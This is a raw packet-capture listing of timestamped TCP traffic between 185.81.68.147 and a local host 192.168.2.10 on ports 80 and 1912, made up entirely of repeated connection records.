                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.767764091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.767822981 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.768424988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.768553972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.768610001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.769303083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.769484043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.769553900 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.770215988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.770313978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.770375013 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.771058083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.771239996 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.771301031 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.771927118 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.772046089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.772104979 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.772803068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.772907019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.772974014 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.773689032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.773823023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.773881912 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.774554014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.774687052 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.774735928 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.775463104 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.775516987 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.775573015 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.776324987 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.776472092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.776523113 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.777199984 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.777240038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.777295113 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.778079033 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.778182030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.778251886 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.778958082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.779061079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.779114962 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.779824018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.779946089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.780014038 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.780714035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.780843019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.780905962 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.781553030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.781677008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.781742096 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.782448053 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.782577991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.782635927 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.783356905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.783397913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.783457041 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.784209013 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.784257889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.784313917 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.785078049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.785182953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.785239935 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.785963058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.786070108 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.786128044 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.786868095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.786988974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.787062883 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.787709951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.787882090 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.787952900 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.788610935 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.788702011 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.788764954 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.790345907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.790360928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.790373087 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.790446997 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.790462017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.790529966 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.791203022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.791290045 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.791347980 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.792110920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.792417049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.792484999 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.793092012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.793175936 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.793236971 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.794059038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.794130087 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.794190884 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.794725895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.794877052 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.794936895 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.795696974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.795816898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.795872927 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.796506882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.796667099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.796715021 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.797357082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.797454119 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.797506094 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.798230886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.798466921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.798521996 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.799120903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.799254894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.799309969 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.799978971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.800082922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.800137043 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.800900936 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.800997019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.801052094 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.803795099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.803808928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.803838015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.803857088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.803869009 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.803880930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.803889036 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.803951979 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.804491997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.804662943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.804714918 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.805347919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.805499077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.805552959 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.806370020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.806382895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.806463957 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.807015896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.855948925 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.862560034 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.862715960 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.862728119 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.862741947 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.862832069 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.862854004 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.862862110 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.918410063 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.953654051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.953736067 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.953851938 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.954021931 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.954222918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.954301119 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.954876900 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.954974890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.955055952 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.955754042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.955868959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.956267118 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.956634998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.956736088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.956780910 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.957525015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.957611084 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.957672119 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.958375931 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.958524942 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.958587885 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.959270000 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.959357023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.959446907 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.960199118 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.960295916 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.960370064 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.975616932 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.975646973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.975657940 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.975708961 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.975720882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.975732088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.975735903 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.975744963 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.975790024 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.975899935 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.975913048 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.975924015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.975934982 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.975948095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.975965977 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976001024 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976027966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976118088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976130009 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976141930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976161003 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976171970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976182938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976183891 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976193905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976206064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976217031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976226091 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976243019 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976617098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976767063 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976778030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976788998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976800919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976810932 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976820946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976830006 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976831913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976845026 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976855040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976861000 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976866007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976872921 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976876974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976891994 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.976907015 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.977468014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.977480888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.977546930 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.977861881 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.977952957 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.978118896 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.978811979 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.978835106 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.978846073 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.978877068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.978902102 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.978930950 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.979494095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.979657888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.979737997 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.980338097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.980387926 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.980782986 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.981194973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.981353045 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.981429100 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.982068062 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.982208014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.982284069 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.982950926 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.983141899 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.983392954 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.983860016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.984005928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.984088898 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.984688044 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.984833956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.984900951 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.985584021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.985738039 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.985795975 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.986449003 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.986566067 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.986654997 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.987355947 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.987504005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.988266945 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.988322973 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.988383055 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.988820076 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.989061117 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.989178896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.989233971 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.989976883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.990161896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.990220070 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.990886927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.991091967 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.991156101 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.991796970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.991959095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.992021084 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.992641926 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.992758036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.992822886 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.993486881 CET8049723185.81.68.147192.168.2.10
